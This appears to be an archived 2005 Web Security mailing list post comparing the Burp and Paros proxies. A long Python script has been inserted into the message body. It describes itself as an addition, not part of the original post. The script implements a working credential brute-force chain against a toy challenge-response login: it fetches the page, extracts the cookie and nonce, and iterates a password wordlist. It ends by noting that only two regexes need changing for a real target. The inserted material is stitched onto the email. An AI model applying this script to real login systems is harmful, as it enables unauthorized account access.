[WEB SECURITY] enumerating all GET and POST params

Thierry Zoller Thierry at Zoller.lu
Thu Dec 8 13:42:44 EST 2005


Dear Prasad Shenoy,

PS> Burp proxy seems to exhibit same features as Paros. You can toggle the
PS> "Intercept On/Off" feature to capture the request/responses plus you can
PS> also devise filters to capture specific requests or responses based on
PS> contents etc. There is a "history" tab that provides you with a history
PS> of requests and corresponding responses and some additional info as well
PS> for a particular session.

Burp creates complex brute-force scenarios:
get index page THEN
extract cookie value
extract challenge
THEN replace username
BRUTE FORCE password
etc

I have not seen this in Paros; then there is the spider mode, etc. etc.
The problem with Burp is that you really need to get your hands
on it a few times to see its potential. Paros is a nice tool to have
too. I am not saying this one is better than that one, I am saying:
there are other tools.

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7
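The chained brute-force sequence sketched in the message above (get index page, extract cookie, extract challenge, replace username, brute-force password), written out as an added Python example. This is not code from the post, nor from Burp or Paros. The target application, its SESSIONID cookie, the hidden "challenge" form field and the sha256(nonce:password) response scheme are all constructed assumptions for illustration; the point is the per-guess request chain, which is what a proxy with a scripted sequence (rather than plain replay) buys you.

```python
import hashlib
import hmac
import re
import secrets


class ToyChallengeApp:
    """Constructed target for the example: a challenge-response login.

    Assumed scheme (an assumption for illustration, not described in the post):
    GET / sets a SESSIONID cookie and embeds a per-session nonce in a hidden
    'challenge' field; POST /login must carry the cookie plus
    response = sha256(nonce + ':' + password). A nonce is valid for one attempt.
    """

    def __init__(self, users):
        self._users = dict(users)   # username -> password (constructed data)
        self._sessions = {}         # session id -> outstanding nonce

    def get_index(self):
        """Return a raw HTTP response string, the way a proxy would see it."""
        sid = secrets.token_hex(8)
        nonce = secrets.token_hex(16)
        self._sessions[sid] = nonce
        body = ('<html><body><form action="/login" method="post">'
                f'<input type="hidden" name="challenge" value="{nonce}">'
                '<input name="username"><input name="response" type="password">'
                '</form></body></html>')
        return ("HTTP/1.1 200 OK\r\n"
                f"Set-Cookie: SESSIONID={sid}; Path=/; HttpOnly\r\n"
                "Content-Type: text/html\r\n\r\n" + body)

    def post_login(self, cookie, form):
        m = re.search(r"SESSIONID=([0-9a-f]+)", cookie)
        # one attempt per nonce: pop it so a replayed challenge is rejected
        nonce = self._sessions.pop(m.group(1), None) if m else None
        if nonce is None:
            return "HTTP/1.1 400 Bad Request\r\n\r\nstale or missing session"
        real_pw = self._users.get(form.get("username", ""))
        if real_pw is not None:
            expected = hashlib.sha256(f"{nonce}:{real_pw}".encode()).hexdigest()
            if hmac.compare_digest(expected, form.get("response", "")):
                return "HTTP/1.1 302 Found\r\nLocation: /home\r\n\r\n"
        return ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                "<html>Login failed</html>")


# Attacker side: the sequence from the post, one full chain per password guess.
SET_COOKIE_RE = re.compile(r"^Set-Cookie:\s*([^;\r\n]+)", re.IGNORECASE | re.MULTILINE)
CHALLENGE_RE = re.compile(r'name="challenge"\s+value="([0-9a-f]+)"')


def extract(pattern, text):
    """Pull one capture group out of a response, like a proxy's extract rule."""
    m = pattern.search(text)
    if m is None:
        raise ValueError(f"could not extract {pattern.pattern!r}")
    return m.group(1)


def attempt(app, username, password):
    """GET index -> extract cookie -> extract challenge -> submit one guess.
    Returns True when the server redirects (login accepted)."""
    index = app.get_index()                    # step 1: get index page
    cookie = extract(SET_COOKIE_RE, index)     # step 2: extract cookie value
    challenge = extract(CHALLENGE_RE, index)   # step 3: extract challenge
    response = hashlib.sha256(f"{challenge}:{password}".encode()).hexdigest()
    reply = app.post_login(cookie, {"username": username,   # step 4: replace username
                                    "response": response})
    return reply.startswith("HTTP/1.1 302")


def brute_force(app, username, wordlist):
    """Step 5: iterate the wordlist. Each guess re-runs the whole chain because
    the challenge is single-use. Returns the password that logged in, or None."""
    for candidate in wordlist:
        if attempt(app, username, candidate):
            return candidate
    return None


def replay_is_rejected(app, username, password):
    """Why the chain must be re-run per guess: reusing one session's challenge
    for a second POST gets a 400, even with the right password."""
    index = app.get_index()
    cookie = extract(SET_COOKIE_RE, index)
    challenge = extract(CHALLENGE_RE, index)
    response = hashlib.sha256(f"{challenge}:{password}".encode()).hexdigest()
    first = app.post_login(cookie, {"username": username, "response": response})
    second = app.post_login(cookie, {"username": username, "response": response})
    return first.startswith("HTTP/1.1 302") and second.startswith("HTTP/1.1 400")


if __name__ == "__main__":
    target = ToyChallengeApp({"alice": "s3cret"})   # constructed account
    print(brute_force(target, "alice", ["123456", "password", "s3cret", "letmein"]))
    print(replay_is_rejected(target, "alice", "s3cret"))
```

Against a real target the two regexes are the only site-specific parts; everything else is the fixed shape of the chain, and a simple request repeater cannot do it because the cookie and the challenge change on every fetch.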



---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/


